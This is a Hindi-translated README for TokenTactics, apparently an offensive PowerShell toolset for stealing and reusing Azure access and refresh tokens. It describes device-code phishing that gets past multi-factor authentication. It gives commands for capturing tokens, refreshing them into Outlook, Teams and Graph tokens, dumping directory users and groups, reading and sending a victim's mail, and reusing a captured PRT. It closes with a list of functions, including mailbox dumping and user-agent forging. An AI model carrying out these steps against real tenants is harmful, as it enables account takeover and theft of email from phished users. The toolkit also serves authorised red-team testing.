
Azure JWT टोकन हेरफेर टूलसेट
Azure JSON Web Token ("JWT") Manipulation Toolset
Azure एक्सेस टोकन आपको एक ऐसे उपयोगकर्ता के रूप में कुछ एंडपॉइंट्स पर प्रमाणित करने की अनुमति देते हैं जो डिवाइस कोड से साइन इन करता है। भले ही उन्होंने मल्टी-फैक्टर ऑथेंटिकेशन का उपयोग किया हो। एक बार जब आपके पास किसी उपयोगकर्ता का एक्सेस टोकन होता है, तो Outlook, SharePoint, OneDrive, MSTeams और अधिक जैसे कुछ ऐप्स तक पहुंच संभव हो सकती है।
उदाहरण के लिए, यदि आपके पास Graph या MSGraph टोकन है, तो आप Azure से कनेक्ट कर सकते हैं और उपयोगकर्ताओं, समूहों आदि को डंप कर सकते हैं। फिर, कंडीशनल एक्सेस नीतियों के आधार पर, आप Azure Core Management टोकन पर स्विच कर सकते हैं और AzureHound चला सकते हैं। इसके बाद, Outlook टोकन पर स्विच करके ईमेल पढ़/भेज सकते हैं या MS Teams पर संदेश पढ़/भेज सकते हैं!
Azure टोकन प्रकारों के बारे में अधिक जानकारी के लिए Microsoft identity platform access tokens
resources फ़ोल्डर में एंडपॉइंट्स के लिए कुछ उदाहरण अनुरोध हैं। डिवाइस कोड फ़िशिंग के लिए एक उदाहरण फ़िशिंग टेम्पलेट भी है।
आप इन टोकन का उपयोग AAD Internals के साथ भी कर सकते हैं। हम दृढ़ता से इस अद्भुत उपकरण को देखने की सलाह देते हैं।
Import-Module .\TokenTactics.psd1
Get-Help Get-AzureToken
Invoke-RefreshToSubstrateToken
Get-AzureToken -Client MSGraph
एक बार उपयोगकर्ता लॉग इन कर लेता है, तो आपको JWT प्रस्तुत किया जाएगा और यह $response वेरिएबल में सहेजा जाएगा। एक्सेस टोकन तक पहुँचने के लिए अपने PowerShell विंडो में $response.access_token का उपयोग करें। आप $response.refresh_token के साथ रिफ्रेश टोकन भी प्रदर्शित कर सकते हैं। संकेत: नए एक्सेस टोकन में रिफ्रेश करते रहने के लिए आपको रिफ्रेश टोकन की आवश्यकता होगी! डिफ़ॉल्ट रूप से, Get-AzureToken परिणाम TokenLog.log में लॉग होते हैं।
Get-AzureToken -Client DODMSGraph
Invoke-RefreshToOutlookToken -domain myclient.org -refreshToken 0.A
$OutlookToken.access_token
Connect-AzureAD -AadAccessToken $response.access_token -AccountId [email protected]
एक बार PRT कैप्चर हो जाने पर, अपना access_token और refresh_token प्राप्त करने के लिए roadrecon के साथ प्रमाणित करें। TokenTactics के साथ रिफ्रेश करते समय, क्लाइंट आईडी 1b730954-1685-4b74-9bfd-dac224a7b894 का उपयोग करें।
Invoke-RefreshToMSGraphToken -domain myclient.org -ClientId 1b730954-1685-4b74-9bfd-dac224a7b894 -refreshToken 0.A
Invoke-ClearToken -Token All
Get-Command -Module TokenTactics
CommandType Name Version Source
----------- ---- ------- ------
Function Invoke-ClearToken 0.0.2 TokenTactics
Function Invoke-DumpOWAMailboxViaMSGraphApi 0.0.2 TokenTactics
Function Invoke-ForgeUserAgent 0.0.2 TokenTactics
Function Get-AzureToken 0.0.2 TokenTactics
Function Get-TenantID 0.0.2 TokenTactics
Function Invoke-OpenOWAMailboxInBrowser 0.0.2 TokenTactics
Function Invoke-ParseJWTtoken 0.0.2 TokenTactics
Function Invoke-RefreshToAzureCoreManagementToken 0.0.2 TokenTactics
Function Invoke-RefreshToAzureManagementToken 0.0.2 TokenTactics
Function Invoke-RefreshToDODMSGraphToken 0.0.2 TokenTactics
Function Invoke-RefreshToGraphToken 0.0.2 TokenTactics
Function Invoke-RefreshToMAMToken 0.0.2 TokenTactics
Function Invoke-RefreshToMSGraphToken 0.0.2 TokenTactics
Function Invoke-RefreshToMSManageToken 0.0.2 TokenTactics
Function Invoke-RefreshToMSTeamsToken 0.0.2 TokenTactics
Function Invoke-RefreshToO365SuiteUXToken 0.0.2 TokenTactics
Function Invoke-RefreshToOfficeAppsToken 0.0.2 TokenTactics
Function Invoke-RefreshToOfficeManagementToken 0.0.2 TokenTactics
Function Invoke-RefreshToOutlookToken 0.0.2 TokenTactics
Function Invoke-RefreshToSubstrateToken 0.0.2 TokenTactics
Function Invoke-RefreshToYammerToken 0.0.2 TokenTactics
TokenTactic की विधियाँ https://o365blog.com/ पर डॉ. नेस्टोरी साइनिमा के महान शोध से अत्यधिक प्रभावित हैं।